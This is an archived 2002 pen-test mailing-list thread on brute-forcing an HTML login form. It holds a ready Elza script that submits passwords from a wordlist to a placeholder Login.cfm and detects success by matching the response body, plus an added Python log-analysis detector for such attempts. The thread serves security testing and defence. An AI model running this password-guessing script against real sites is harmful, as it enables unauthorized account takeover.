RE: Password HTML form bruteforce

From: Greg (greg@hoobie.net)
Date: Fri Apr 19 2002 - 21:29:10 EDT


Whoops,

Always spot the mistakes after you send it. Dodgy coding.

the line :
 subst ACCOUNT = admin
should read as:
  subst USERSTRING = admin

also the line :
  print Positive Authentication with Login: ACCOUNT, Password: CURRPASS
should read as :
  print Positive Authentication with Login: USERSTRING, Password: PASSSTRING

regards

Greg

> -----Original Message-----
> From: Greg [mailto:greg@hoobie.net]
> Sent: 20 April 2002 02:05
> To: joh ket; pen-test@securityfocus.com
> Subject: RE: Password HTML form bruteforce
>
>
> I'm afraid Brutus doesn't handle 302's correctly. Dodgy coding if
> you ask me.
>
> Why don't you try Elza
> (http://online.securityfocus.com/tools/1127) with this script
> which is based on one found in the Elza docs. Obviously change
> the target url and username. This script will read each string
> from words.txt and submit each attempt checking for the
>
> var autoredir = on
> subst ACCOUNT = admin
>
> proc POSITIVEAUTH
> print Positive Authentication with Login: ACCOUNT, Password: CURRPASS
> endproc POSITIVEAUTH
>
> proc ATTEMPTAUTH
> field userid = USERSTRING
> field password = PASSSTRING
> # Add any other form fields that need to be sent here
> post url http://TargetAddress/Login.cfm
> call POSITIVEAUTH if body = Some warm glowing message about how you're logged in now.
> endproc ATTEMPTAUTH
>
> call ATTEMPTAUTH PASSSTRING % words.txt
>
> In the above script, if you set 'autoredir' to off you will not
> be automatically redirected by the 302 and the '%location%'
> variable will be made available to you for examination. It might
> be easier to just let Elza handle the redirection and then match
> some known test in the body of the successful authentication page
> as shown above.
>
> Read the docs for Elza, you'll need to build a list of scripts up
> before it becomes really useful.
>
> cheers
>
> Greg
>
>
> > -----Original Message-----
> > From: joh ket [mailto:johket@hotmail.com]
> > Sent: 18 April 2002 10:16
> > To: pen-test@securityfocus.com
> > Subject: Password HTML form bruteforce
> >
> >
> >
> >
> > Hi there,
> >
> > I am currently involved in a pen test on a website
> > which is using form-based authentication.
> >
> > I figured out that an account, named 'test' exists...
> > (...)
> >
> > Now I want to brute force this account, I am using
> > Brutus AET2 for this.
> >
> > But I do not know how to use the HTML response.
> >
> > Below the packet capture of a response of a login
> > which was successful:
> >
> > HTTP/1.1.302.Object.Moved..Location:.start.cfm?cid=
> > (lines deleted)
> > <head><title>Document.Moved</title></head><body
> > ><h1>Object.Moved</h1>
> > This.document.may.be.found.<a.HREF="start.cfm?
> > cid=
> > (lines deleted)
> >
> > A capture of an unsuccessful login looks like this:
> >
> > HTTP/1.1.302.Object.Moved..Location:.original.cfm?
> > login=Invalid password. Please try again
> > (lines deleted)
> > Document.Moved</title></head>.<body><h1>Object.
> > Moved</h1>This.document.may.be.found.<a.HREF="
> > original.cfm?login=Invalid password. Please try
> > again">here</a>
> >
> > So depending on the password I get redirected to a
> > page...
> >
> > How should the primary and the secondary response
> > be configured?
> >
> > Or does somebody else have a better idea how to do
> > this?
> >
> > Thanks in advance!
> >
> > Joh Ket
> >
> >
> >
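Seen from the server side, the captures above show why status codes alone won't reveal a dictionary run against Login.cfm: the application answers both good and bad passwords with a 302, differing only in the Location target. The following is an added example, not code from the thread or from Elza, that flags clients hammering the login form by request rate instead; it assumes IIS W3C extended log fields (date time c-ip cs-method cs-uri-stem cs-uri-query sc-status) and uses a constructed sample log.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed IIS W3C log sample (not from the original thread). Every POST,
# right or wrong password, gets a 302 exactly as Joh's captures show, so
# sc-status cannot separate success from failure; only client rate can.
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2002-04-18 10:15:02 10.0.0.5 POST /Login.cfm - 302
2002-04-18 10:15:03 10.0.0.5 POST /Login.cfm - 302
2002-04-18 10:15:03 10.0.0.5 POST /Login.cfm - 302
2002-04-18 10:15:04 10.0.0.5 POST /Login.cfm - 302
2002-04-18 10:15:05 10.0.0.5 POST /Login.cfm - 302
2002-04-18 10:15:06 10.0.0.5 POST /Login.cfm - 302
2002-04-18 10:15:06 10.0.0.5 GET /start.cfm cid=42 200
2002-04-18 10:15:40 10.0.0.9 POST /Login.cfm - 302
2002-04-18 10:20:00 10.0.0.9 POST /Login.cfm - 302
"""

LINE_RE = re.compile(r"^(?P<date>\S+) (?P<time>\S+) (?P<ip>\S+) (?P<method>\S+) "
                     r"(?P<stem>\S+) (?P<query>\S+) (?P<status>\d+)$")

def parse_log(text):
    """Yield (timestamp, ip, method, stem) for each W3C data line."""
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue  # skip directives and blanks
        m = LINE_RE.match(line)
        if m is None:
            continue  # tolerate lines in another format
        ts = datetime.strptime(m["date"] + " " + m["time"], "%Y-%m-%d %H:%M:%S")
        yield ts, m["ip"], m["method"], m["stem"]

def find_bruteforce(text, login_path="/Login.cfm", threshold=5, window_s=60):
    """Return {ip: peak POSTs to login_path seen inside any window_s seconds}
    for clients that reached threshold; sliding window per client IP."""
    recent = defaultdict(deque)  # ip -> timestamps of POSTs still in window
    peak = {}
    for ts, ip, method, stem in parse_log(text):
        if method != "POST" or stem != login_path:
            continue
        q = recent[ip]
        q.append(ts)
        while (ts - q[0]).total_seconds() > window_s:
            q.popleft()  # drop attempts older than the window
        if len(q) >= threshold:
            peak[ip] = max(peak.get(ip, 0), len(q))
    return peak
```

With the sample above only 10.0.0.5 trips the default threshold; the two requests from 10.0.0.9 five minutes apart never fall inside one window.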

----------------------------------------------------------------------------
This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
Service. For more information on SecurityFocus' SIA service which
automatically alerts you to the latest security vulnerabilities please see:
https://alerts.securityfocus.com/



This archive was generated by hypermail 2.1.7 : Sat Apr 12 2008 - 10:53:20 EDT